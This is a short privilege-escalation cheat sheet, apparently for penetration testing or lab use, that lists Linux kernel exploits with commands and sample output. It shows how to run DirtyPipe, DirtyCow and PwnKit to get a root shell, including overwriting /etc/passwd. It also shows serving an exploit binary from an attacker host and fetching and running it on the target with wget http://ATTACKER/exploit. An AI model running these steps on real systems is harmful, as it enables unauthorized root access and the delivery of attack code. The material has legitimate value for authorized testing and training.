KERNEL EXPLOITS
Check kernel version
Exact kernel version — Search for matching exploits
uname -r
Example Output
uname -r
4.15.0-20-generic
Search: 'linux kernel 4.15.0-20 exploit'
Results: DirtyCow, various local privesc
(Match exact version to exploits)
linux-exploit-suggester
Automated kernel exploit finder — Suggests matching CVEs
./linux-exploit-suggester.sh
or: ./les.sh
Example Output
./linux-exploit-suggester.sh
[+] CVE-2021-4034 (PwnKit)
Versions: ALL
Confidence: Highly probable
[+] CVE-2022-0847 (DirtyPipe)
Versions: 5.8 - 5.16.11
[+] CVE-2016-5195 (DirtyCow)
Versions: 2.6.22 - 4.8.3
DirtyPipe (CVE-2022-0847)
Overwrite read-only files — Very reliable
Kernel 5.8 - 5.16.11
Example Output
uname -r: 5.13.0-39-generic (VULNERABLE)
./dirtypipe /etc/passwd 1 '${root::0:0:root:/root:/bin/bash}'
su root (no password)
# whoami
root
DirtyCow (CVE-2016-5195)
Race condition write to read-only — Older but still seen in labs
Kernel 2.6.22 - 4.8.3
Example Output
uname -r: 4.4.0-21-generic (VULNERABLE)
gcc -pthread dirty.c -o dirty -lcrypt
./dirty newpassword
su firefart
Password: newpassword
# whoami
root (as firefart user with UID 0)
PwnKit (CVE-2021-4034)
Polkit local privesc — Almost always works if pkexec exists
pkexec on most Linux distros
Example Output
which pkexec && pkexec --version
pkexec version 0.105
./PwnKit
# whoami
root
(Works on almost all Linux distros with polkit installed)
Compile on target or cross-compile
Match architecture (x86/x64) — Static compile avoids library issues
gcc exploit.c -o exploit
or compile on attacker: gcc -static -m32 exploit.c -o exploit
Example Output
On target:
gcc exploit.c -o exploit
./exploit
OR cross-compile on attacker:
gcc -static -m64 exploit.c -o exploit
python3 -m http.server 80
On target:
wget http://ATTACKER/exploit
chmod +x exploit && ./exploit